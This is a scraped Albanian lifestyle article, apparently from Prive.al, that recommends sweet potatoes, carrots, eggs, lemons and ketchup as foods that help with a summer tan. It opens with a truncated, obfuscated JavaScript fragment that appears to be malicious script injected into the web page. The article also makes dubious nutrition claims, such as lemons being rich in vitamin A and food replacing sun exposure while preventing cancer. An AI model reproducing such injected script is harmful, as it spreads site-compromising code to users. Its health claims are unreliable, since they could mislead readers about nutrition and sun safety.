;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Këto ushqime do ju ndihmojnë të merrni ngjyrë të bukur këtë verë

By

Nuk ka asgjë më të bukur se ai shkëlqimi perfekt i verës!

Nuk ka rëndësi a po kaloni orë të tëra nën diell në plazh, në pishinë apo në oborrin e shtëpisë të gjithë duan ta arrijnë atë nuancën e artë të lëkurës. Po sikur të ju themi se ju mund të hani disa gjëra që ju ndihmojnë të arrini atë ngjyrën perfektë që keni në mendje?

E vërtetë – jo diell për orë të gjata, as solarium as ato losionet për nxirje e në vend të kësaj fruta, vezë dhe lajthi. E kjo nuk është rutina tipike e nxirjes, por ju ndihmon në evitimin e kancerit dhe e sëmundjeve të zemrës.

Patatet të ëmbla

Këto perime ngjyrë portokallie janë të mbushura me vitaminë A. Jo vetëm që do rrisin gjasat e një nxirjeje më të bukur po ato do rregullojnë edhe nivelin e sheqerit në gjakun tuaj.

Karrotat

Këto janë të mbushura me beta karoten e cila rrit intensitetin e pigmentit në lëkurë. Plus ato njihen për benefitet kardiovaskulare dhe ndikojnë në shëndetin e syve.

Vezët

Këto kanë superfuqi! Përmbajnë sasi të madhe të vitaminës A, B, D, kalcium, selenium që ndihmojnë në shkëlqimin e lëkurës gjatë verës. Vezët ndihmojnë edhe në parandalimin e sëmundjeve kardiovaskulare dhe përmisojnë shëndetin e syve.

Limonët

Përmbajnë sasi të lartë të vitaminës A e cila nxit melaninën brenda trupin, substancë kjo e cila i jep ngjyrën lëkurës. Kështu që limoni duhet të jetë esencial në ushqimin e verës, ndoshta një limonatë e cila edhe do të ju freskonte.

Keqapi

Ky ka një mori antioksidantësh përfshirë likopenin dhe beta karotenin. Ne nuk po sugjerojmë te hani vetëm keqap tani po një masë e arsyeshme ditore do ishe e pranueshme. Beta karoteni në keqap do ju mundësojë një lëkurë më të nxirë dhe të bukur. /Prive.al

 

Artikuj të ngjashëm